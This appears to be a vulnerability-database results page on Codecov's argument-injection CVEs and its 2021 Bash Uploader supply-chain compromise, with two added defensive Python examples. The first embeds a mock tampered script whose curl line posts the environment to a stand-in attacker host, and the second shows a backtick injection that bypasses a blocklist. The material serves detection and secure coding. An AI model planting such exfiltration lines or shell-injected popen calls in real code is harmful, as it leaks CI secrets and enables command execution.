67 matches found

PyPA
added 2022/07/13 12:15 p.m.

PYSEC-2022-238

This affects the package codecov before 2.0.16. The vulnerability occurs due to not sanitizing gcov arguments before they are provided to the popen method...

CVSS 6.5 · AI score 6.9 · EPSS 0.00991
Exploits 1 · References 3 · Affected software 1
OSV
added 2022/07/13 12:15 p.m.

PYSEC-2022-238

This affects the package codecov before 2.0.16. The vulnerability occurs due to not sanitizing gcov arguments before they are provided to the popen method...

CVSS 6.5 · AI score 4.7 · EPSS 0.00991
Exploits 1 · References 3
CVE
added 2022/07/13 11:50 a.m.

CVE-2019-10800

The CVE-2019-10800 issue affects the Python package codecov prior to 2.0.16, caused by inadequate sanitization of gcov arguments before passing them to subprocess popen. Impact is described in connected advisories as a code execution/command invocation risk (details vary by report). Remediation i...

CVSS 6.5 · AI score 6.3 · EPSS 0.00991
Exploits 1 · References 2 · Affected software 1
Cvelist
added 2022/07/13 11:50 a.m.

CVE-2019-10800 Command Injection

This affects the package codecov before 2.0.16. The vulnerability occurs due to not sanitizing gcov arguments before they are provided to the popen method...

CVSS 6.5 · AI score 6.4 · EPSS 0.00991
Exploits 1 · References 2
CNNVD
added 2022/07/13 12:00 a.m.

codecov argument injection vulnerability

codecov is an open-source code coverage tool from Codecov. A security vulnerability exists in codecov versions prior to 2.0.16, which stems from not sanitizing the gcov arguments before supplying them to the popen method...

CVSS 6.5 · AI score 6.5 · EPSS 0.00991
Exploits 1 · References 4
Positive Technologies
added 2022/07/13 12:00 a.m.

PT-2022-8076 · Codecov +1

Name of the vulnerable software and affected versions: codecov versions prior to 2.0.16. Description: The issue arises from the failure to sanitize gcov arguments before they are provided to the popen method. This lack of sanitization can lead to potential exploitation. Recommendations: For versio...

CVSS 7.1 · AI score 6.3 · EPSS 0.00991
Exploits 1 · References 16
Github Security Blog
added 2022/05/24 5:07 p.m.

Improper Neutralization of Special Elements in Output Used by a Downstream Component in Codecov

Codecov npm module before 3.6.2 allows remote attackers to execute arbitrary commands via the "gcov-args" argument...

CVSS 8.8 · AI score 9 · EPSS 0.01859
Exploits 1 · References 3 · Affected software 1
OSV
added 2022/05/24 5:07 p.m.

GHSA-MH2H-6J8Q-X246 Improper Neutralization of Special Elements in Output Used by a Downstream Component in Codecov

Codecov npm module before 3.6.2 allows remote attackers to execute arbitrary commands via the "gcov-args" argument...

CVSS 8.8 · AI score 6.2 · EPSS 0.01859
Exploits 1 · References 3
Rapid7 Blog
added 2021/07/09 8:13 p.m.

Securing the Supply Chain: Lessons Learned from the Codecov Compromise

Supply chain attacks are all the rage these days. While they’re not a new part of the threat landscape, they are growing in popularity among more sophisticated threat actors, and they can create significant system-wide disruption, expense, and loss of confidence across multiple organizations,...

AI score 8
Exploits 0
The Hacker News
added 2021/06/18 7:20 a.m.

Google Releases New Framework to Prevent Software Supply Chain Attacks

As software supply chain attacks emerge as a point of concern in the wake of SolarWinds and Codecov security incidents, Google is proposing a solution to ensure the integrity of software packages and prevent unauthorized modifications. Called "Supply chain Levels for Software Artifacts" SLSA, and...

AI score 0.1
Exploits 0
OSV
added 2021/05/31 3:39 p.m.

Replacement of bash script by an attacker with one that includes malicious commands in Codecov Bash uploader (all versions downloaded from Jan 2021 through April 2021; because the attacker had control of the script, the version number included in it cannot be trusted)

In Codecov Bash uploader (all versions downloaded from Jan 2021 through April 2021; because the attacker had control of the script, the version included in it cannot be trusted), a replacement of the bash script by an attacker with one that includes malicious commands exists in the Bas...

AI score 3.6
Exploits 0 · References 5
OSV
added 2021/05/31 3:39 p.m.

GSD-2021-1000009 Replacement of bash script by an attacker with one that includes malicious commands in Codecov Bash uploader (all versions downloaded from Jan 2021 through April 2021; because the attacker had control of the script, the version number included in it cannot be trusted)

In Codecov Bash uploader (all versions downloaded from Jan 2021 through April 2021; because the attacker had control of the script, the version included in it cannot be trusted), a replacement of the bash script by an attacker with one that includes malicious commands exists in the Bas...

AI score 7.2
Exploits 0 · References 5
The Hacker News
added 2021/05/14 7:02 a.m.

Rapid7 Source Code Breached in Codecov Supply-Chain Attack

Cybersecurity company Rapid7 on Thursday revealed that unidentified actors improperly managed to get hold of a small portion of its source code repositories in the aftermath of the software supply chain compromise targeting Codecov earlier this year. "A small subset of our source code repositorie...

AI score 7.3
Exploits 0
Rapid7 Blog
added 2021/05/13 5:05 p.m.

Rapid7’s Response to Codecov Incident

Cybersecurity is Rapid7’s top priority, and when there is an incident that may pose a risk to our customers, we are transparent about it. We also believe that providing this level of transparency ultimately helps the security community better address potential pending threats and safeguard...

AI score 0.3
Exploits 0
CISA
added 2021/04/30 12:00 a.m.

Codecov Releases New Detections for Supply Chain Compromise

CISA is aware of a compromise of the Codecov software supply chain in which a malicious threat actor made unauthorized alterations of Codecov’s Bash Uploader script, beginning on January 31, 2021. Upon discovering the compromise on April 1, 2021, Codecov immediately remediated the affected script...

AI score 6.7
Exploits 0 · References 2
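The GSD-2021-1000009 entries above make the point that a version string inside a script the attacker controlled cannot be trusted, and the CISA entry notes that Codecov published detections for the modified Bash Uploader. As an added example (not Codecov's code and not its published detections), the block below shows the consumer-side check that follows from that caveat: pin a digest of the script out of band and compare the download against it, rather than reading the embedded VERSION, and flag any line that posts the process environment to a remote host. The two script bodies, the hostnames and the pinned digest are constructed for the demo.

```python
"""Integrity and exfiltration check for a downloaded uploader script.

Added example illustrating the GSD-2021-1000009 caveat; not Codecov's code.
GOOD_SCRIPT / TAMPERED_SCRIPT and the hostnames are constructed for the demo.
"""
import hashlib
import hmac
import re
from typing import List, Optional

# Constructed "known-good" script as a maintainer would have published it.
GOOD_SCRIPT = b"""#!/bin/bash
VERSION="1.0.1"
curl -sS https://uploader.example.invalid/upload -F coverage=@coverage.xml
"""

# Constructed tampered copy: identical VERSION line, one added line that posts
# the CI environment elsewhere. An attacker who can edit the file can of course
# leave the version string untouched, which is why it proves nothing.
TAMPERED_SCRIPT = b"""#!/bin/bash
VERSION="1.0.1"
curl -sm 0.5 -d "$(env)" https://attacker.example.invalid/upload
curl -sS https://uploader.example.invalid/upload -F coverage=@coverage.xml
"""

# In practice this digest is pinned in the CI config, taken from a trusted
# channel, not derived from the download. It is computed here only so the
# example is self-contained.
PINNED_SHA256 = hashlib.sha256(GOOD_SCRIPT).hexdigest()

# Heuristic: a curl/wget invocation on the same line as the whole environment.
ENV_EXFIL = re.compile(rb"\b(curl|wget)\b.*(\$\(env\)|`env`)")


def embedded_version(script: bytes) -> Optional[str]:
    """Read the VERSION= line; shown only to demonstrate it is identical in both copies."""
    m = re.search(rb'^VERSION="([^"]*)"', script, re.M)
    return m.group(1).decode() if m else None


def verify_pinned(script: bytes, pinned_hex: str) -> bool:
    """Constant-time comparison of the script digest against the out-of-band pin."""
    digest = hashlib.sha256(script).hexdigest()
    return hmac.compare_digest(digest, pinned_hex)


def suspicious_lines(script: bytes) -> List[int]:
    """1-based line numbers that match the environment-exfiltration heuristic."""
    return [i for i, line in enumerate(script.splitlines(), 1) if ENV_EXFIL.search(line)]


def safe_to_run(script: bytes, pinned_hex: str) -> bool:
    """Gate before `bash <(...)`: must match the pin and carry no exfil pattern."""
    return verify_pinned(script, pinned_hex) and not suspicious_lines(script)


if __name__ == "__main__":
    for name, body in (("good", GOOD_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(name, "version:", embedded_version(body),
              "pin ok:", verify_pinned(body, PINNED_SHA256),
              "exfil lines:", suspicious_lines(body),
              "run:", safe_to_run(body, PINNED_SHA256))
```

The digest comparison is the control that actually matters; the regex is a coarse hunt heuristic for triage of scripts already fetched into build logs or caches, and will not catch an attacker who obfuscates the `env` call.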
Schneier on Security
added 2021/04/21 4:12 p.m.

Backdoor Found in Codecov Bash Uploader

Developers have discovered a backdoor in the Codecov bash uploader. It's been there for four months. We don't know who put it there. Codecov said the breach allowed the attackers to export information stored in its users' continuous integration (CI) environments. This information was then sent to a...

AI score 2.4
Exploits 0
Malwarebytes
added 2021/04/20 8:13 p.m.

CodeCov supply-chain compromise likened to SolarWinds attack

CodeCov, a company that creates software auditing tools for developers, was recently breached; the company says it was breached on April 1 and reported it on April 15. According to investigators, this incident, in turn, gave attackers access to an unknown number of CodeCov's clients' networks...

AI score 1.3
Exploits 0
Rapid7 Blog
added 2021/04/16 5:12 p.m.

Codecov Discloses Supply Chain Compromise

The following blog was co-authored by Curt Barnard and Caitlin Condon. On April 15, 2021, code coverage and testing company Codecov announced a supply chain compromise in which a malicious party gained access to their Bash Uploader script and modified it without authorization, enabling the...

AI score 0.8
Exploits 0
Veracode
added 2020/07/21 1:33 a.m.

OS Command Injection

codecov is vulnerable to OS command injection. The vulnerability exists because it was possible to use backticks (`) to bypass the sanitizer. This issue is related to CVE-2020-7597...

CVSS 9.3 · AI score 3 · EPSS 0.03805
Exploits 2 · References 5 · Affected software 1
NVD
added 2020/07/20 6:15 p.m.

CVE-2020-15123

In the codecov npm package before version 3.7.1, the upload method has a command injection vulnerability. Clients of the codecov-node library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. A similar CVE, CVE-2020-7597 for GHSA-5q88-cjfq-g2mh, was...

CVSS 9.3 · AI score 9.6 · EPSS 0.03805
Exploits 1 · References 5
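The codecov advisories on this page (CVE-2019-10800 for the Python package, CVE-2020-15123 and the Veracode entry for the npm package) describe one pattern: a user-supplied "gcov args" string is concatenated into a command and handed to a shell via popen, and a sanitizer that only strips `;`, `&` and `|` is bypassed with backticks. The block below is an added example, not code from the codecov project, showing that pattern next to its fix. It assumes a POSIX shell is available and uses `echo` as a stand-in for the real `gcov` binary; the `naive_sanitize` blocklist is hypothetical and illustrates the bypass class, not codecov's actual sanitizer.

```python
"""Argument injection through a shell-interpreted popen string.

Added example for the codecov advisories; not the project's code. `echo` stands
in for `gcov` so the block runs anywhere with a POSIX shell (assumption).
"""
import shlex
import subprocess
from typing import List

# Constructed attacker input: a plausible gcov flag followed by a backtick
# command substitution. It contains no ';', '&' or '|', so a blocklist that
# only strips those separators lets it straight through.
ATTACKER_ARGS = "-b `echo INJECTED`"

# Characters a POSIX shell interprets; used only to report what a sanitizer missed.
SHELL_META = set(";&|`$(){}<>\n")


def naive_sanitize(gcov_args: str) -> str:
    """Hypothetical blocklist sanitizer (not codecov's): strips separators, forgets backticks."""
    return gcov_args.translate(str.maketrans("", "", ";&|"))


def leaked_metachars(gcov_args: str) -> List[str]:
    """Shell metacharacters still present after naive_sanitize()."""
    return sorted(SHELL_META & set(naive_sanitize(gcov_args)))


def unsafe_run(gcov_args: str) -> str:
    """Vulnerable shape: 'sanitized' string concatenated into a command run via the shell."""
    cmd = "echo " + naive_sanitize(gcov_args)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def safe_run(gcov_args: str) -> str:
    """Hardened shape: split into argv once, shell=False, so every token is a literal argument."""
    argv = ["echo", *shlex.split(gcov_args)]
    proc = subprocess.run(argv, capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def shell_safe_string(gcov_args: str) -> str:
    """If a shell string is unavoidable (e.g. remote execution), quote each argv token."""
    return shlex.join(["gcov", *shlex.split(gcov_args)])


if __name__ == "__main__":
    print("leaked after naive sanitizer:", leaked_metachars(ATTACKER_ARGS))
    print("shell=True :", unsafe_run(ATTACKER_ARGS))   # substitution executed
    print("shell=False:", safe_run(ATTACKER_ARGS))     # backticks passed literally
    print("quoted     :", shell_safe_string(ATTACKER_ARGS))
```

With `shell=True` the inner `echo INJECTED` runs and the program receives `-b INJECTED`; with an argv list and `shell=False` the program receives the backticks as literal bytes. Blocklists of metacharacters are the wrong tool here: `$(...)`, backticks, newlines and redirections all have to be enumerated, and the page's own history (CVE-2020-7597 fixed, then bypassed in CVE-2020-15123) shows how that goes.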